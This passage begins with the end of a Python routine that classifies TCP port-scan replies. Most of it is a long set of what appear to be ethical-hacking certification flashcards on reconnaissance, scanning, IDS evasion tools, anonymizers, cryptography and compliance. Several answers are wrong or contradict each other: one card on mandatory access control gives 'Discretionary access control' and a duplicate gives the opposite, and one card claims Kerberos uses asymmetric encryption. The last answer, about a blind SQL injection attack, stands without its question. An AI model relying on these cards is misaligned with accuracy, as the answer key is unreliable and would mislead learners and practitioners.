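    """Interpret the reply (or silence) to a SYN or inverse-flag probe."""
    flags = parse_tcp_flags(response) if response else set()
    if scan_type == "syn":
        if {"SYN", "ACK"} <= flags:
            return "open"
        if "RST" in flags:
            return "closed"
        return "filtered"           # no reply, or an ICMP unreachable instead
    if scan_type in ("fin", "null", "xmas"):
        if response is None:
            return "open|filtered"  # RFC 793 silence: open port, or a filter dropped the probe
        if "RST" in flags:
            return "closed"
        return "unexpected"
    raise ValueError(f"unknown scan type {scan_type}")


if __name__ == "__main__":
    reply = build_tcp_header(80, 40000, ["SYN", "ACK"])
    print(parse_tcp_flags(reply), classify_port("syn", reply))
    print(probe_type(parse_tcp_flags(build_tcp_header(40000, 80, ["FIN", "PSH", "URG"]))))
```

The "open|filtered" result is why Nmap reports inverse-flag scans that way: silence is ambiguous. The other caveat is that the technique only works against RFC 793-compliant stacks; Windows and many Cisco devices answer every inverse-flag probe with RST, so all ports look closed.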

Spectre Meltdown Access Token Manipulation Application Shimming File System Permissions Weakness Path Interception Scheduled Task Launch Daemon Plist Modification Setuid and Setgid Web Shell

What are some Privilege Escalation Techniques

B) ip.src==212.77.66.55 and tcp.srcport==23 C) ip.src==212.77.66.55 && tcp.srcport==23

To search for all Telnet packets from 212.77.66.55, which Wireshark expression should be in place? (Choose all that apply) A) ip.src==212.77.66.55 and tcp.srcport==21 B) ip.src==212.77.66.55 and tcp.srcport==23 C) ip.src==212.77.66.55 && tcp.srcport==23 D) ip.src==212.77.66.55 && tcp.srcport==21

Nbtstat SuperScan Hyena Winfingerprint NetBIOS Enumerator NSAuditor

Tools for NetBIOS enumeration:

GetNotify Contact-Monkey Yesware Read Notify WhoReadMe MSGTAG Trace Email Zendio

Tools for email tracking as part of footprinting:

RemoteExec PDQ Deploy Dameware Remote Support ManageEngine Desktop Central PsExec TheFatRat

Tools for executing applications

Rankur Google Alerts Social Mention WhosTalkin ReputationDefender PR Software Naymz BrandsEye Brandyourself Talkwalker

Tools for online reputation of the target.

Proxy Switcher Proxy Workbench ProxyChains SoftCab's Proxy Chain Builder CyberGhost Proxifier

Tools used to set up proxy chains, where multiple proxies further hide your activities.

Cloud Computing Threats Advanced Persistent Threats Viruses and Worms Mobile Threats Botnet Insider Attack

Top 6 Information Security Attack Vectors

Path Analyzer Pro VisualRoute Network Pinger Magic NetTrace GEOSpider 3D Traceroute vTrace AnalogX HyperTrace Trout Network Systems Traceroute Roadkil's Trace Route Ping Plotter

Traceroute Tools

ICMP protocol TTL field

Traceroute programs work on the concept of the ____ (Time Exceeded replies from each router) and use the ____ in the IP header of the probe packets (ICMP Echo on Windows, UDP by default on Unix) to discover the routers on the path to a target host.

D. Nessus

Tracy is managing a web server and wants to search for vulnerabilities. What tool would be a good choice for her to start with? A. Black Widow B. Httrack C. BurpSuite D. Nessus

computationally less feasible

Traditional network scanning techniques will be ___ due to larger search space (64 bits of host address space or 2 ^64 addresses) provided by IPv6 in a subnet

target's customer base

Traffic monitoring helps to collect information about the ____ which help attackers to disguise as a customer and launch social engineering attacks on the target

D. The ethical hacker always obtains written permission before testing.

Two hackers attempt to crack a company's network resource security. One is considered an ethical hacker, whereas the other is not. What distinguishes the ethical hacker from the "cracker"? A. The cracker always attempts white-box testing. B. The ethical hacker always attempts black-box testing. C. The cracker posts results to the Internet. D. The ethical hacker always obtains written permission before testing.

Passive Reconnaissance Active Reconnaissance

Two types of Reconnaissance

Operating System Attacks Mis-configuration Attacks Application Level Attacks Shrink-Wrap Code Attacks

Types of Attacks on a System

find specific computers (routers, servers, etc)

Use SHODAN search engine that lets you ____ using a variety of filters.

pdf documents Microsoft Word files

Useful information may reside on the target organization's website in the form of ____

Connection status and content-type Accept-Ranges Last-Modified information X-Powered-By information Web server in use and its version

Using Burp Suite, Zaproxy, Paros Proxy, Website Informer, Firebug, etc. to view headers that provide what kind of information?

metadata extraction network analysis fingerprinting

Using FOCA, it is possible to undertake multiple attacks and analysis techniques such as ____, ____, DNS snooping, proxies search, ____, open directories search, etc.

normal traffic

Using Reverse HTTP Shells: This type of traffic is considered as a ___ by an organization's network perimeter security like DMZ, firewall, etc.

netstat -b

Using netstat, typing ___ lets you see the executable tied to the open port.

netstat -an

Using netstat, typing ____ displays all connections and listening ports, with addresses and port numbers in numerical form.

B)87698415

Using tcpdump, you acquire the TCP handshake and capture several packets sent between two devices in your network. The last packet you capture contains the following values: Seq no. 26556942 (next seq no. 26557263) Ack no. 87698415 Window 8700 LEN = 1656 bytes 0f data Based on this information, which sequence number will be used in the reply to this packet? A)26556942 B)87698415 C)87698416 D)26557263

Management Network Zone

Usually an area you'd find rife with VLANs and maybe controlled via IPSec and such. This is a highly secured zone with very strict policies.

A. MX

While footprinting a network, you successfully perform a zone transfer. Which DNS record in the zone transfer indicates the company's e-mail server? A. MX B. EM C. SOA D. PTR

Buffer overflow DoS attacks

Vulnerabilities in UPnP may allow attackers to launch ____ or ___

Nessus GFI LanGuard Qualys FreeScan Retina CS OpenVAS Core Impact Professional Security Manager Plus MBSA Nexpose Shadow Security Scanner SAINT Nsauditor Network Security Auditor Security Auditor's Research Assistant (SARA)

Vulnerability Scanners

Retina CS for Mobile SecurityMetrics MobileScan Nessus Vulnerability Scanner

Vulnerability Scanning Tools for Mobile

-Selectively creates custom vulnerability checks -Identifies security vulnerabilities and takes remedial action -Creates different types of scans and vulnerability tests -Helps ensure third-party security applications offer optimum protection -Performs network device vulnerability checks

What are features of GFI LanGuard?

AnyWho PeopleSmart US Search Veromi Intelius PrivateEye 411 People Search Now PeopleFinders Public Background Checks

What are some People Search Online Services?

1) Install and maintain firewall configuration to protect data. 2) Remove vendor-supplied default passwords and other default security features. 3) Protect stored data. 4) Encrypt transmission of cardholder data. 5) Install, use, and update AV (antivirus). 6) Develop secure systems and applications. 7) Use "need to know" as a guideline to restrict access to data. 8) Assign a unique ID to each stakeholder in the process (with computer access). 9) Restrict any physical access to the data. 10) Monitor all access to data and network resources holding, transmitting, or protecting it. 11) Test security procedures and systems regularly. 12) Create and maintain an information security policy.

What are the 12 requirements for groups and organizations involved in the entirety of the payment process--from card issuers, to merchants, to those storing and transmitting card information.

1) Preparation for Incident Handling and Response 2) Detection and Analysis 3) Classification and Prioritization 4) Notification 5) Containment 6) Forensic Investigation 7) Eradication and Recovery 8) Post-incident Activities

What are the Eight steps to the Incident Management Process?

Confidentiality Integrity Availability Authenticity Non-Repudiation

What are the Elements of Information Security

1) Perform risk assessment to identify risks to the organization's assets 2) Learn from standard guidelines and other organizations 3) Include senior management and all other staff in policy development 4) Set clear penalties and enforce them 5) Make final version available to all of the staff in the organization 6) Ensure every member of your staff read, sign, and understand the policy 7) Deploy tools to enforce policies 8) Train your employees and educate them about the policy 9) Regularly review and update

What are the Nine steps to Create and Implement Security Policies?

Black Hats White Hats Gray Hats Suicide Hackers Script Kiddies Cyber Terrorists State Sponsored Hackers Hacktivist

What are the eight hacker Classes?

Internet Internet DMZ Production Network Zone Intranet Zone Management Network Zone

What are the five network security zones defined by ECC?

1) Identify Security Objectives 2) Application Overview 3) Decompose Application 4) Identify Threats 5) Identify Vulnerabilities

What are the five parts of Threat Modeling?

American Registry for Internet Numbers (ARIN) Asia-Pacific Network Information Center (APNIC) Reseaux IP Europeens (RIPE) NCC Latin America and Caribbean Network Information Center (LACNIC) African Network Information Center (AfriNIC)

What are the five registrant bodies?

1) Footprinting through search engines 2) Footprinting using advanced google hacking techniques 3) Footprinting through social networking sites 4) Website footprinting 5) Email footprinting 6) Competitive intelligence 7) WHOIS footprinting 8) DNS footprinting 9) Network footprinting 10) Footprinting through social engineering

What are the ten steps of the footprinting methodology?

Network Threats Host Threats Application Threats

What are the three Information Security Threat Categories?

Unicast Multicast Broadcast

What are the three main address types of IPv4?

Collect Network Information Collect System Information Collect Organization's Information

What are the three main objectives of footprinting?

Security Functionality Usability

What are the three parts to the triangle as one increases the others decrease

Logical safeguards, Administrative safeguards, and physical safeguards

What are the three safeguards in a risk assessments?

Signature-based and anomaly-based

What are the two detection methods used by IDS systems?

To recover keys in the event the original keys are lost or deleted, and to provide access to data to other third parties, such as law enforcement investigations

What are the two functions of key escrow?

Connectionless communication (UDP) Connection-Oriented Communication (TCP)

What are the two methods of data transfer at the Transport layer?

scalar - defines a single object tabular - defines multiple related objects grouped together in MIB tables

What are the two types of managed objects in SNMP.

TTL Window

What are the two versions of ACK flag probe?

XML filters XML gateways Ensuring a robust XML parser

What are three mitigations to a XML DoS attack?

GSA Email Spider Web Data Extractor

What are two web spider tools?

Rapid replication

What are worms typically known for?

Netstat -an

What command is used to listen to open ports with netstat?

Destination unreachable, communication administratively prohibited (a router or firewall is blocking the traffic, typically ICMP)

What does an ICMP Type 3/Code 13 error message indicate?

Destination unreachable, because the packet requires fragmentation but the DF (don't fragment) bit is set

What does an ICMP Type 3/Code 4 error message indicate?

Risk transference

What happens when insurance is used to address a risk (the risk is shifted to a third party, not eliminated)?

Source host Contact e-mail Serial number Refresh time Retry time Expire time TTL

What information can be found in the SOA record?

Total visitors Page views Bounce rate Live visitors map Site ranking

What information can be gathered monitoring website traffic?

A)Blood vessels

What information is measured in a retina scan? A)Blood vessels B)Pupil size C)Colored ridges D)Ocular pressure

Residential address Email addresses Contact numbers Date of birth Photos Social networking profiles Blog URLs Satellite pictures of private residencies Upcoming projects Operating environment

What information is returned from doing a people search about a person or organization?

B. A reliable and consistent point of contact for all incident response services for associates of the Department of Homeland Security

Which of the following best describes the role that the U.S. Computer Security Incident Response Team (CSIRT) provides? A. Vulnerability measurement and assessments for the U.S. Department of Defense B. A reliable and consistent point of contact for all incident response services for associates of the Department of Homeland Security C. Incident response services for all Internet providers D. Pen test registration for public and private sector

C)Filtering network packets

Which of the following can NOT be prevented by the security and privacy settings on a client's web browser? A)Running Java applets B)Cookie storage C)Filtering network packets D)Handling pop-up windows

Input validation

Which of the following can prevent bad input from being presented to an application?

A)Username and password

Which of the following combinations does NOT represent multi-factor authentication? A)Username and password B)Fingerprint scan and password C)USB token and retina scan D)USB token and password

D. lsof

Which of the following commands is the best choice to use on a Linux machine when attempting to list processes and the UIDs associated with them in a reliable manner? A. ls B. chmod C. pwd D. lsof

C) sc query

Which of the following commands lists the running services on a Windows machine? A) netsh services B) netstat -s C) sc query D) wmic bios get services

C. nmap -sn 172.17.24.0/24 D. nmap -PI 172.17.24.0/24

Which of the following commands would you use to quickly identify live targets on a subnet? (Choose all that apply.) A. nmap -A 172.17.24.17 B. nmap -O 172.17.24.0/24 C. nmap -sn 172.17.24.0/24 D. nmap -PI 172.17.24.0/24

C)SSL

Which of the following connection types can cause a security issue when an IDS is in the path? A)T1 B)ISDN C)SSL D)GRE tunnel

A)Announcement of a security hole in a product

Which of the following constitutes a vulnerability? A)Announcement of a security hole in a product B)Detailed description of how to exploit a product C)Instructions on how to secure a product D)List of best practices to prevent exploitation

A. Use ARPWALL. C. Use private VLANs D. Use static ARP entries.

Which of the following could provide useful defense against ARP spoofing? (Choose all that apply.) A. Use ARPWALL B. Set all NICs to promiscuous mode. C. Use private VLANs. D. Use static ARP entries.

B. Blue team

Which of the following describes security personnel who act in defense of the network during attack simulations? A. Red team B. Blue team C. Black hats D. White hats

C)Attack profile

Which of the following does NOT occur during risk assessment? A)Vulnerability identification B)Threat identification C)Attack profile D)Control analysis

B)Adherence of a company to its security policy

Which of the following does a security audit evaluate? A)Execution of the security plan B)Adherence of a company to its security policy C)Adherence of the security policy to industry standards D)Security readiness of the organization

C) Discretionary access control

Which of the following ensures that the enforcement of an organizational security policy does not rely on voluntary user compliance and secures information by assigning labels on information and comparing this to the level of security a user is operating at? A) Authorized access control B) Mandatory access control C) Discretionary access control D) Role-based access control

D)Network topology weaknesses F)Application configuration errors

Which of the following information can be gathered by a network vulnerability scanner? (Choose all that apply.) A)Spear phishing email storage B)Sensitive information sent to outside networks C)Local user account credentials D)Network topology weaknesses E)Packets received from malicious sources F)Application configuration errors

A)They are usually expensive to implement.

Which of the following is NOT a drawback to implementing anti-virus systems? A)They are usually expensive to implement. B)They rely upon signature file updates. C)They often provide limited detection techniques. D)They negatively affect the performance of the system on which they reside.

D)Server layer

Which of the following is NOT a layer of the Web application architecture? A)Client layer B)Business logic layer C)Database layer D)Server layer

C)Provides only user behavior measurement and analysis

Which of the following is NOT a limitation of a signature-based network intrusion detection system (NIDS)? A)Provides a large number of false positives B)Requires an attack signature to detect new attack types. C)Provides only user behavior measurement and analysis D)Can be defeated by network tunnels and encryption

B)Copying sensitive data to a USB drive

Which of the following is NOT a threat on a Windows file server because of a missing security patch vulnerability? A)Exposure of passwords B)Copying sensitive data to a USB drive C)Exposure of sensitive files D)Improper access to databases

C)Syntax of the certificate

Which of the following is NOT accomplished during certificate validation? A)Integrity of the certificate B)Identity of the issuer C)Syntax of the certificate D)Validity of the certificate

A)Faster than the CORBA standard

Which of the following is NOT an advantage to using SOAP? A)Faster than the CORBA standard B)Platform-independent C)Leverages multiple transport protocols D)Simplifies communications

C) TCP-over-dns

Which of the following is a client-server tool utilized to evade firewall inspection? A) Kismet B) Wireshark C) TCP-over-dns D) Snow

B)XML denial of service issues

Which of the following is a common Service Oriented Architecture (SOA) vulnerability that can be addressed by filters and gateways? A)Insecure communications B)XML denial of service issues C)Replay attacks D)Information leakage

A. Audit trail

Which of the following is a detective control? A. Audit trail B. CONOPS C. Procedure D. Smartcard authentication E. Process

B) As a symmetric key algorithm, the keys would need to be sent over a different channel

Which of the following is a potential drawback to using AES to share data? A) It takes a long time to encrypt data, which slows down communication B) As a symmetric key algorithm, the keys would need to be sent over a different channel C) Configuration of AES is complicated and time-consuming to set up D) Performance is greatly affected by massive overhead

C)Tailgating

Which of the following is an attack on physical security? A)SYN flood B)Brute force C)Tailgating D)IP spoofing

B)Static WEP key

Which of the following is an example of a symmetric encryption? A)File hash B)Static WEP key C)Public key D)Private key

C)Wireshark

Which of the following is an open-source packet analyzer that can be used for network troubleshooting and analysis? A)Cain and Abel B)Nessus C)Wireshark D)CUPP

B) Single sign on

Which of the following is defined as a system where users need to remember only one user ID and password combination to be authenticated for multiple resources? A) Simple sign on B) Single sign on C) Digital sign on D) Certificate sign on

A. Mandatory access control

Which of the following is defined as ensuring the enforcement of organizational security policy does not rely on voluntary user compliance by assigning sensitivity labels on information and comparing this to the level of security a user is operating at? A. Mandatory access control B. Authorized access control C. Role-based access control D. Discretionary access control

A. DNS poisoning

Which of the following is described as the process of distributing incorrect IP addresses and name pairs with the intent of diverting traffic? A. DNS poisoning B. DNS spoofing C. Network aliasing D. Reverse Address Resolution Protocol

D)Internal website not the same as the external company website

Which of the following is evidence of a DNS poisoning attack? A)Data forwarded to the wrong switch ports B)Unusual amount of TCP SYN requests to the web server C)Traffic misdirected internally to the wrong subnet D)Internal website not the same as the external company website

D)ACLs on the router and NTFS permissions on files

Which of the following is the BEST example of defense in depth? A)Two access control lists on the same router B)Two factors required for authentication on a single system C)Two different anti-virus applications installed on every computer D)ACLs on the router and NTFS permissions on files

B)DSA

Which of the following is the Federal Information Processing Standard for digital signatures? A)AES B)DSA C)RSA D)GAK

D) Ensure services run with least privilege

Which of the following is the best choice for protection against privilege escalation vulnerabilities? A) Ensure drivers are appropriately signed B) Set admin accounts to run on least privilege C) Make maximum use of automated services D) Ensure services run with least privilege

C. Connect to a SPAN port on a switch

Which of the following is the best choice in setting an NIDS tap? A. Connect directly to a server inside the DMZ. B. Connect directly to a server in the intranet. C. Connect to a SPAN port on a switch. D. Connect to the console port of a router.

B)Sheep dipping

Which of the following is the process of analyzing suspect files for viruses and other malware? A)Purging B)Sheep dipping C)Cleaning D)Degaussing

D)Symmetric algorithm

Which of the following is true of 3DES? A)Hashing algorithm B)Stronger than AES C)Stream cipher D)Symmetric algorithm

E) All of the above

Which of the following is true regarding Kerberos? A) Kerberos makes use of UDP as a transport protocol B) Kerberos makes use of TCP as a transport protocol C) Kerberos uses port 88 for transmission of data D) Kerberos makes use of both symmetric and asymmetric encryption techniques E) All of the above

C) MX record priority increases as the preference number decreases

Which of the following is true regarding MX records? A) MX records require an accompanying CNAME record B) MX records point to name servers C) MX record priority increases as the preference number decreases D) MX record entries are required for every namespace

C) MX records priority increases as the preference number decreases

Which of the following is true regarding MX records? A) MX records require an accompanying CNAME record B) MX records point to name servers C) MX records priority increases as the preference number decreases D) MX record entries are required for every namespace

A) SSL works at the transport layer and S-HTTP operates at the application layer

Which of the following is true regarding SSL and S-HTTP? A) SSL works at the transport layer and S-HTTP operates at the application layer B) SSL works at the Network layer and S-HTTP operates at the application layer C) SSL works at the application layer and S-HTTP operates at the Network layer D) SSL works at the application layer and S-HTTP operates at the transport layer

B) A POP3 client contacts the server to receive mail

Which of the following is true regarding a POP3 client? A) A POP3 client contacts the server to send mail B) A POP3 client contacts the server to receive mail C) A POP3 client contacts the server to send and receive mail D) None of the above

A. Static NAT is one to one mapping

Which of the following is true regarding static NAT? A. Static NAT is one to one mapping B. Static NAT is one to many mapping C. Static NAT is many to many mapping D. Static NAT is many to one mapping

A) The location of the Snort rules for this device is c:\ect\snort\rules

Which of the following is true regarding the Snort configuration entry shown here: val RULE_PATH c:\ect\snort\rules A) The location of the Snort rules for this device is c:\ect\snort\rules B) All rule violations should alert to c:\ect\snort\rules C) The Snort configuration file is located in c:\ect\snort\rules D) None of the above

D. traceroute

You are on a Cisco router and wish to identify the path a packet travels to a specific IP. Which of the following is the best command choice for this? A. ping B. ifconfig C. tracert D. traceroute

D. It is almost impossible to discover the sniffer on the network.

Which of the following is true regarding the discovery of sniffers on a network? A. To discover the sniffer, ping all addresses and examine latency in responses. B. To discover the sniffer, send ARP messages to all systems and watch for NOARP responses. C. To discover the sniffer, configure the IDS to watch for NICs in promiscuous mode. D. It is almost impossible to discover the sniffer on the network.

telnet

Which of the following is used for banner grabbing?

Netcraft

Which of the following is used for identifying a web server OS?

D. Base64

Which of the following is used to encode password within HTTP basic access authentication? A. MD5 B. TDM C. FDM D. Base64 E. DES

nmap

Which of the following is used to perform customized network scans?

A) A worm is malware B) A worm replicates on its own

Which of the following is/are true of a worm? A) A worm is malware B) A worm replicates on its own

C)Java

Which of the following languages poses the highest security risk because of its high penetration rate, number of documented vulnerabilities, and average user patch status? A)C++ B)C# C)Java D)Python

B)CSIRT

Which of the following organizations provides incident response services in partnership with the Department of Homeland Security? A)OWASP B)CSIRT C)NIST D)ITIL

D)More acceptance of the policy

Which of the following results when a consistent security policy has the support of executive management? A)More compressed SLAs B)More input from users C)Fewer security breaches D)More acceptance of the policy

B. MAC flooding D. ARP spoofing

Which of the following techniques can be used to gather information from a fully switched network or to disable some of the traffic isolation features of a switch? (Choose two.) A. DHCP starvation B. MAC flooding C. Promiscuous mode D. ARP spoofing

A)Token-passing network

Which of the following technologies passes a signal between nodes that authorizes each node to communicate only when the node possesses the signal? A)Token-passing network B)VPN C)Mesh network D)Star network

A. Whisker B. Fragroute E. ADMutate F. Inundator

Which of the following tools can assist with IDS evasion? (Choose all that apply.) A. Whisker B. Fragroute C. Capsa D. Wireshark E. ADMutate F. Inundator

C. TCPflow

Which of the following tools can be used to extract application layer data from TCP connections captured in a log file into separate files? A. Snort B. Netcat C. TCPflow D. Tcpdump

C. Libwhisker

Which of the following tools is the best choice to assist in evading an IDS? A. Nessus B. Nikto C. Libwhisker D. Snort

E)SwayzCryptor

Which of the following tools is used to obfuscate binary code in an executable so that it is undetectable by anti-virus software? A)Cygwin B)ChewBacca C)CyberGate D)g++ E)SwayzCryptor

C)Routers

Which of the following use a rule-based access model? A)NTFS permissions B)US military C)Routers D)Hubs

C)SHA 1

Which of the following uses 160 bits for hashing? A)MD5 B)SHA 2 C)SHA 1 D)SHA 3

C)iptables

Which of the following versions of the Linux firewall is required for Linux kernel versions 2.4x and above? A)NPF B)ipfwadm C)iptables D)ipchains

D. PCI DSS (Payment Card Industry Data Security Standard)

Which of the following was created to protect credit card data at rest and in transit in an effort to reduce fraud? A. TCSEC B. Common Criteria C. ISO 27002 D. PCI DSS

C. SOX (Sarbanes-Oxley Act)

Which of the following was created to protect shareholders and the general public from corporate accounting errors and fraudulent practices, and to improve the accuracy of corporate disclosures? A. GLBA B. HIPAA C. SOX D. FITARA

C)Mantrap

Which of the following would be an appropriate mitigation for tailgating? A)Redundancy B)Account lockout policy C)Mantrap D)iptables

C. Netcraft

Which of the following would be the best choice for footprinting restricted URLs and OS information from a target? A. www.archive.org B. www.alexa.com C. Netcraft D. Yesware

C. A guard posted outside the door

Which of the following would be the best example of a deterrent control? A. A log aggregation system B. Hidden cameras onsite C. A guard posted outside the door D. Backup recovery systems

A)The same key is used to encrypt and decrypt data.

Which one of the following statements best describes symmetric encryption? A)The same key is used to encrypt and decrypt data. B)Data is hashed and signed by a digital signature issued from a trusted third-party. C)One private key is used to encrypt and another public key is used to decrypt data. D)Data is concealed in ignored sections of files.

A)CSIRT

Which organization provides an incident response service to act as a reliable and trusted single point of contact for reporting computer security incidents worldwide? A)CSIRT B)GSI C)NIST D)OWASP

Tailgating

Which physical security issue is mitigated by a mantrap?

A)80

Which port is the most likely to be open on a web server? A)80 B)23 C)25 D)3389

D)80

Which port number is used by the HTTPTunnel tool to bypass a firewall? A)666 B)22 C)3389 D)80

C. TCP 53

Which protocol and port number combination is used by default for DNS zone transfers? A. UDP 53 B. UDP 161 C. TCP 53 D. TCP 22

B)ICMP C)UDP

Which protocols are used by default when executing a traceroute in UNIX/Linux and Windows? (Choose all that apply.) A)RTP B)ICMP C)UDP D)TCP

VoIP enumeration

___ provides sensitive information such as VoIP gateways/servers, IP-PBX systems, client software (softphones)/VoIP phones, user-agent IP addresses, and user extensions

C)The attacker sends personnel an email that appears to come from an individual with the authority to request confidential information, but the email includes a bogus link.

Which scenario demonstrates a phishing attack? A)The attacker attempts to gain confidential information, especially login credentials, by looking over an authorized user's shoulder. B)A program writes data to a buffer until it overruns the buffer's boundary and overwrites adjacent memory locations. C)The attacker sends personnel an email that appears to come from an individual with the authority to request confidential information, but the email includes a bogus link. D)The attacker attempts to steal passwords through an innocent looking application.

File permissions

Which security control can prevent data access by a hacker interacting and modifying HTML on a web server?

Controlling the use of USB ports

Which security policy will mitigate the copying of sensitive data to a USB drive?

D)Wassenaar Arrangement

Which standard provides guidelines for the responsible and open transfer of conventional arms and sensitive or dual-use military resources? A)ISO 2700 B)Rainbow Books C)Common Criteria D)Wassenaar Arrangement

Trusted Computer System Evaluation Criteria (TCSEC)

Which standard uses divisions called security assurance levels to evaluate products?

Information Technology Security Evaluation Criteria (ITSEC)

Which standard uses levels called security functional requirements to assess security functionality?

D)Restore systems to normal service operation as quickly as possible

Which statement best describes the purpose of incident management? A)Log all incidents that take place in an organization B)Trigger alerts to prevent potential risks and threats C)Analyze vulnerabilities as quickly as possible D)Restore systems to normal service operation as quickly as possible

Session hijacking is an attack that aims at stealing a legitimate session and posing as that user while communicating with the web resource

Which statement defines session hijacking most accurately?

B)Static NAT uses a one-to-many mapping

Which statement is FALSE with regard to network address translation (NAT)? A)Dynamic NAT uses a many-to-many mapping B)Static NAT uses a one-to-many mapping C)Static NAT uses a one-to-one mapping D)PAT uses a many-to-one mapping

B)SSL operates above the Transport layer.

Which statement is true about SSL? A)SSL is protected against CBC attacks. B)SSL operates above the Transport layer. C)SSL is an active encryption standard. D)SSL encrypts each message independently.

A)GAK

Which term refers to the statutory obligation of companies to disclose their cryptographic keys to government agencies? A)GAK B)TPM C)key escrow D)PKI

B)Protection profiles C)Evaluation assurance levels

Which two of the following are key components of the Common Criteria evaluation system? A)Security functional requirements B)Protection profiles C)Evaluation assurance levels D)Security assurance levels

Phlashing

Which type of DDoS attack can damage actual networking hardware?

SYN flooding

Which type of DDoS attack takes advantage of the TCP three-way handshake to overwhelm the victim's listening queue?

B)Polymorphic shellcode

Which type of IDS evasion technique hides commonly used strings with encoding and uses a stub to decode and execute differently each time? A)ASCII shellcode B)Polymorphic shellcode C)Packet fragmentation D)Overlapping fragments

Dynamic NAT

Which type of NAT uses a many-to-many mapping model?

Port Address Translation (PAT)

Which type of NAT uses a one-to-many mapping model?

Static NAT

Which type of NAT uses a one-to-one mapping model?

B)Rule-based access control

Which type of access control is supported by standard routers? A)Role-based access control B)Rule-based access control C)Mandatory access control D)Discretionary access control

MAC flood attacks

Which type of attack can be prevented by using port security to create static ARP entries in the MAC table?

SYN flood

Which type of attack exploits the TCP handshake process?

B. White box

Which type of attack is generally conducted as an inside attacker with elevated privileges on the resources? A. Gray box B. White box C. Black box D. Active reconnaissance

MAC flood attack

Which type of attack sends many frames with bogus MAC addresses as the source?

Session fragmentation

Which type of attack splits the attack payload into many packet fragments?

Switches

Which type of device is targeted by MAC flood attacks?

C) Hardware

Which type of keylogger cannot be detected by antivirus software? A) Stealth B) Heuristic C) Hardware D) Software

Brute force

Which type of password attack attempts every combination of characters?

White box

Which type of penetration test requires the tester to have complete knowledge of the target system(s)?

Black box

Which type of penetration test requires the tester to have no knowledge of the target system(s)?

Gray box

Which type of penetration test requires the tester to have only limited knowledge of the target system(s)?

A) FIN

Which type of port scan sets only the flag that brings TCP conversations to an orderly close? A) FIN B) RST C) IDLE D) XMAS

B)WPA2

Which wireless encryption mechanism uses AES? A)WEP B)WPA2 C)WPA D)LEAP

Hacktivism

Which word refers to hacking for a specific cause?

SNMP

___ was designed to manage IP-enabled devices across a network.

C)Gateway between an inside and outside network that is located on the public side of the DMZ and is designed to defend against attacks aimed at the inside network

While implementing a demilitarized zone (DMZ) to protect several network resources, your company decides to implement a bastion host. What is the BEST description of this device? A)Component that restricts access between an internal network and the Internet or between other sets of networks B)Resource, usually located on the DMZ, that pretends to be a real target, but is really an isolated resource where the attacker cannot do any real damage C)Gateway between an inside and outside network that is located on the public side of the DMZ and is designed to defend against attacks aimed at the inside network D)System fitted with two network interfaces that sits between a public, untrusted network and an internal network to provide secure access

B)Tails

While researching specific security issues for your company, you want to use an anonymizer to ensure that your privacy is protected. Which of the following is NOT an anonymizer? A)TOR B)Tails C)Psiphon D)Proxify

text viewers

Whitespace Steganography: Because spaces and tabs are generally not visible in ___, the message is effectively hidden from casual observers

SNOW

Whitespace Steganography: Use the ___ tool to hide the message

built-in encryption

Whitespace Steganography: Use of ___ makes the message unreadable even if it is detected

-To hide the source IP address so that they can hack without any legal corollary -To mask the actual source of the attack by impersonating a fake source address of the proxy -To remotely access intranets and other website resources that are normally off limits -To interrupt all the requests sent by a user and transmit them to a third destination, hence victims will only be able to identify the proxy server address -Attackers chain multiple proxy servers to avoid detection

Why do attackers use proxy servers?

Privacy and anonymity Protects from online attacks Access restricted content Bypass IDS and Firewall rules

Why use an anonymizer?

To hide malicious file content within a benign file

Why would a hacker utilize alternate data streams (ADS)?

D)Evade detection by the IDS

Why would an attacker work very slowly when performing a ping scan of the network? A)Reduce the network traffic B)Ensure all machines are scanned C)Give the targets more time to respond D)Evade detection by the IDS

determine the security context

The Windows operating system uses access tokens to ___ of a process or thread

802.11

Wireless LAN standards created by IEEE

Hub

Wireless access points function as a ____.

A. When the primary SOA record serial number is higher than the secondary's

Within the DNS system, a primary server (SOA) holds and maintains all records for the zone. Secondary servers will periodically ask the primary if there have been any updates, and if updates have occurred, they will ask for a zone transfer to update their own copies. Under what conditions will the secondary name server request a zone transfer from a primary? A. When the primary SOA record serial number is higher than the secondary's B. When the secondary SOA record serial number is higher than the primary's C. Only when the secondary reboots or restarts services D. Only when manually prompted to do so

Motive

____ originates out of the notion that the target system stores or processes something valuable, and this leads to the threat of an attack on the system

D)On Linux/Unix machines, there is no response.

You are a network security analyst for your company. You perform the following scan from a remote machine: nmap -sX 141.8.225.72 You use Wireshark to capture the response packets. How do you determine which ports are open? A)On Windows machines, there is no response. B)On all machines, there is SYN/ACK response. C)On all machines, there is RST response. D)On Linux/Unix machines, there is no response.

B)Block all traffic over port 110.

You are a security administrator working in Chicago. The Chicago office currently has a policy in place that users should not read personal email on corporate devices. However, you have recently noticed a lot of POP3 traffic over your network even though your company's email service uses SMTP and IMAP. The office manager requests that you block POP3 traffic at the firewall. What should you do? A)Block all traffic over port 25. B)Block all traffic over port 110. C)Block incoming traffic over port 110. D)Block incoming traffic over port 25.

D)Using a mobile app to gain access to internal networks

You are a security analyst evaluating possible threats using Blackberry mobile devices. Which best describes a blackjacking attack? A)Using a mobile app to gain access to the Blackberry Enterprise Server (BES) B)Using the Blackberry Enterprise Server (BES) to limit the rights of mobile apps C)Using the Blackberry Enterprise Server (BES) to block mobile app installation D)Using a mobile app to gain access to internal networks

C)Restore from local backup media

You are a security analyst hired by a company to determine their possible response strategies to various cloud computing threats. You determine that their current cloud provider is vulnerable to SQL injection attacks. Their current versions of virtual OSes are also prone to kernel-level rootkits. If an attacker exploits both of these vulnerabilities, which response strategy would you recommend they use to sanitize an affected virtual machine? A)Roll back to the latest cloud storage snapshot B)Copy and replace key system files from an unaffected virtual machine C)Restore from local backup media D)Run a virus scan to quarantine and delete any detected files

A) The port is open

You are performing a FIN scan and get no response from a port. What does this indicate? A) The port is open B) The port is closed C) The scan has failed to reach the target D) None of the above

C)Limit the frequency of manual installations in patch management plan

You are a security consultant for a large retail chain. You have been asked to help the company establish the appropriate procedures to ensure that they comply with the PCI-DSS standard. Which of the following guidelines is NOT required for compliance? A)Restrict physical access to cardholder data B)Assign a unique ID to each person with computer access C)Limit the frequency of manual installations in patch management plan D)Install and maintain a firewall configuration to protect cardholder data

A)Perform a Boolean-based blind SQL injection attack, and include the results in the audit report.

